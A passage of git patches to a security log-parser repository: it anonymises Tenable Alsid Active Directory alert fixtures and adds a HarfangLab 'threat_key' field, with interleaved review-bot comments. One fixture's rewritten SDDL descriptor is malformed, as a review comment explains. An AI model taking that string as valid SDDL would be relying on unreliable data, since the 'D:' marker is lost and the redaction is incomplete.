@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "useraccountcontrol", "alsidAttributeValue": "\"DONT_EXPIRE NORMAL \"", - "eventID": "2432", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert3.json b/Tenable/alsid/tests/trailflow_alert3.json index 0d3b1d784..b073ae6e5 100644 --- a/Tenable/alsid/tests/trailflow_alert3.json +++ b/Tenable/alsid/tests/trailflow_alert3.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" 
\"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", "alertID": 8, "alsidAttributeName": "\"ntsecuritydescriptor\"", - "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", - "eventID": "7856795", + "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", + "eventID": "7856000", "eventType": "ACL change" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert4.json b/Tenable/alsid/tests/trailflow_alert4.json index 1d4ae660f..a2179f541 100644 --- a/Tenable/alsid/tests/trailflow_alert4.json +++ b/Tenable/alsid/tests/trailflow_alert4.json 
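Review bot: The SID rewrite in trailflow_alert3.json breaks the SDDL string it is meant to anonymise: the original owner ended `-40655D:AI(`, where `D:` opens the DACL, and the new text reads `-406000:AI(`, so the `D` marker has been absorbed into the RID and the descriptor is no longer syntactically valid SDDL. The parser copies the value through as an opaque `alsidAttributeValue`, so the test still passes, but the fixture no longer represents input the integration would actually see. The redaction is also only partial: the original domain SID `S-1-5-21-1519513455-2607746426-5380147357` still appears verbatim in three ACEs and the original RID `40655` in the last one, so nothing is really hidden. Either keep the original string or replace the domain SID with one placeholder used in the owner and in every ACE while keeping the marker, e.g. `...-1105D:AI(A;OICIID;FA;;;S-1-5-21-1000000000-2000000000-3000000000-512)`. Both hunks (input/expected message and the expected `alsidAttributeValue`) carry the same string and need the same fix.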
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", "alertID": 8, "alsidAttributeName": "\"gptini-displayname\"", "alsidAttributeValue": "\"Nouvel objet Strat\u00e9gie de groupe\"", - "eventID": "7855399", + "eventID": "7855000", "eventType": "New object" }, "type": "trailflow" From a0bfdeaa4f061e8fdff21bfb70487d3e519f6135 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou
Date: Mon, 16 Dec 2024 16:16:30 +0100
Subject: [PATCH 150/150] HarfangLab: Adding field for Harfanglab Threat Key
---
 HarfangLab/harfanglab/_meta/fields.yml | 5 +++++
 HarfangLab/harfanglab/ingest/parser.yml | 1 +
 HarfangLab/harfanglab/tests/alert_1.json | 3 ++-
 HarfangLab/harfanglab/tests/alert_2.json | 3 ++-
 HarfangLab/harfanglab/tests/alert_3.json | 3 ++-
 HarfangLab/harfanglab/tests/alert_4.json | 3 ++-
 HarfangLab/harfanglab/tests/alert_5.json | 3 ++-
 7 files changed, 16 insertions(+), 5 deletions(-)
diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 902363c55..1ad5ffb1e 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -1043,6 +1043,11 @@ harfanglab.threat_id:
 name: harfanglab.threat_id
 type: keyword
 
+harfanglab.threat_key:
+ description: The key of the threat
+ name: harfanglab.threat_key
+ type: keyword
+
 network.direction:
 description: The direction of the network connection
 name: network.direction
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 253355fce..2b8fb9c96 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -266,6 +266,7 @@ stages:
 harfanglab.aggregation_key: "{{json_event.message.aggregation_key}}"
 harfanglab.process.powershell.command: "{{json_event.message.details_powershell.PowershellCommand}}"
 harfanglab.process.powershell.script_path: "{{json_event.message.details_powershell.PowershellScriptPath}}"
+ harfanglab.threat_key: "{{json_event.message.threat_key}}"
 
 alert_process_info:
 actions:
diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json
index 9ac1abc0a..484cfee47 100644
--- a/HarfangLab/harfanglab/tests/alert_1.json
+++ b/HarfangLab/harfanglab/tests/alert_1.json
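Review bot: The description added for `harfanglab.threat_key` ("The key of the threat") does not tell a reader how it differs from `harfanglab.threat_id`, declared immediately above it in fields.yml, which is the first question anyone mapping these two fields will ask. The fixtures in this patch only show short decimal strings ("2971", "16364", "20528"), which looks like an internal numeric index rather than the threat id, but that is inferred from test data; the description should state what the key actually is, e.g. `description: Key of the HarfangLab threat this alert is attached to, taken from the event's threat_key field (distinct from harfanglab.threat_id)`. The parser.yml hunk maps it with `"{{json_event.message.threat_key}}"` in the same style as its sibling keys, but the enclosing stage starts before that hunk, so whether the mapping is conditional on the event type is not visible here.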
@@ -35,7 +35,8 @@
 "execution": 0,
 "groups": [],
 "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "2971"
 },
 "host": {
 "domain": "EXAMPLE",
diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json
index 60c039be7..ffb3dd936 100644
--- a/HarfangLab/harfanglab/tests/alert_2.json
+++ b/HarfangLab/harfanglab/tests/alert_2.json
@@ -35,7 +35,8 @@
 "{\"id\": \"00000000-0000-0000-0000-000000000000\", \"name\": \"EXAMPLE\"}"
 ],
 "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "2912"
 },
 "host": {
 "domain": "EXAMPLE",
diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json
index f37d2fad4..4ea4e0884 100644
--- a/HarfangLab/harfanglab/tests/alert_3.json
+++ b/HarfangLab/harfanglab/tests/alert_3.json
@@ -42,7 +42,8 @@
 "script_path": "C:\\Scripts\\SomeWhere\\Get-FaInterco\\Get-FaNetworkFlowV2.ps1"
 }
 },
- "status": "new"
+ "status": "new",
+ "threat_key": "16364"
 },
 "host": {
 "domain": "Example",
diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json
index 1a45b2b22..c0c748a53 100644
--- a/HarfangLab/harfanglab/tests/alert_4.json
+++ b/HarfangLab/harfanglab/tests/alert_4.json
@@ -42,7 +42,8 @@
 "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}"
 ],
 "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "1343"
 },
 "host": {
 "domain": "DOMAINSI",
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
index 19abfe567..3202a7f54 100644
--- a/HarfangLab/harfanglab/tests/alert_5.json
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -45,7 +45,8 @@
 "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}"
 ],
 "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "20528"
 },
 "host": {
 "domain": "NT_DOMAIN",